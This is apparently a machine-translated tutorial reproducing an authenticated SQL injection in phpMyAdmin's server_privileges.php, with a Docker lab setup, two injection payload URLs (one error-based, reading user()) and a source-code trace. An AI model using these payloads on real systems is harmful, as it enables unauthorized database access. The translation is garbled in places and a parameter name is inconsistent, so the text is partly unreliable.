Shulou(Shulou.com)06/02 Report--

How to carry out phpMyAdmin background SQL injection, I believe that many inexperienced people do not know what to do, so this paper summarizes the causes of the problem and solutions, through this article I hope you can solve this problem.

About 0x01 phpMyAdmin is a database management tool based on PHP and constructed on the host of the website by Web-Base, which allows managers to use Web interface to manage MySQL database. Through this Web interface, it can become a better way to input complicated SQL syntax in a simple way, especially to deal with the import and export of a large amount of data.

Overview of 0x02 vulnerabilities

There are controllable variables in the user interface SQL execution statement, and the controllable parameters are not filtered and spliced directly. Can cause a low-privileged user to exceed his or her authority to execute SQL instructions.

0x03 affects version premise: know a username password phpMyAdmin 4

< 4.9.4phpMyAdmin 5 < 5.0.1 0x04 环境搭建 在线环境： 转发本文至朋友圈并截图发至公众号内 自行搭建： 本次复现环境使用PhpMyAdmin4.5.0版本，使用docker搭建。 git clone https://github.com/Paper-Pen/TLSHUB.gitcd TLSHUB/phpAdmin/docker-compose up -ddocker ps

Visit the page http://xx.xx.xx.xx:8001

The database account password root/li9hu environment has been set up, and you can begin to reproduce the vulnerabilities.

Recurrence of 0x05 vulnerabilities

Simple summary process: page location server_privileges.php; setting variable ajax_requests to true; setting variable validate_username to true value; setting variable username to our spliced injection statement.

Construct payload: http://192.168.209.139:8001/server_privileges.php?ajax_requests=true&validate_username=1&username=1%27or%201=1%20--+db=&token=c2064a8c5f437da931fa01de5aec6581&viewing_mode=server

(token and other parameters are automatically provided when you visit the page.) when we look at the data received by the backend, we can see that the SQL has been spliced successfully.

After execution, the program will only tell SQL whether the execution was successful or not, and the failure will report an error, so here we can use error injection.

Construct payload: http://192.168.209.139:8001/server_privileges.php?ajax_request=true&validate_username=1&username=1%27and%20extractvalue(1,concat(0x7e,(select%20user()),0x7e))--+db=&token=c2064a8c5f437da931fa01de5aec6581&viewing_mode=server

As a result, you can see that the instruction we injected has been successfully executed.

0x06 vulnerability analysis locates to the file libraries/server_privileges.lib.php, which is the point where SQL injection exists. Both username and validate_username can be controlled. We backtrack to locate the function where if is located.

You can see that if is inside the PMA_getExtraDataForAjaxBehavior function. The next step is to navigate to the point where this function is triggered using the phpsotorm shortcut ctrl+B.

Jump to the file server_privileges.php to see that $extra_data triggers this function, which is inside an if. The next step is to ctrl+shift+F the global search variable is_ajax_request to see if you can control it to be true.

Jump to the file libraries/common.inc.php where there is a controllable variable ajax_request as long as you attach true to it and you can return true.

0x07 repair mode

Update the latest official patch

After reading the above, have you mastered the method of how to inject SQL into phpMyAdmin background? If you want to learn more skills or want to know more about it, you are welcome to follow the industry information channel, thank you for reading!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.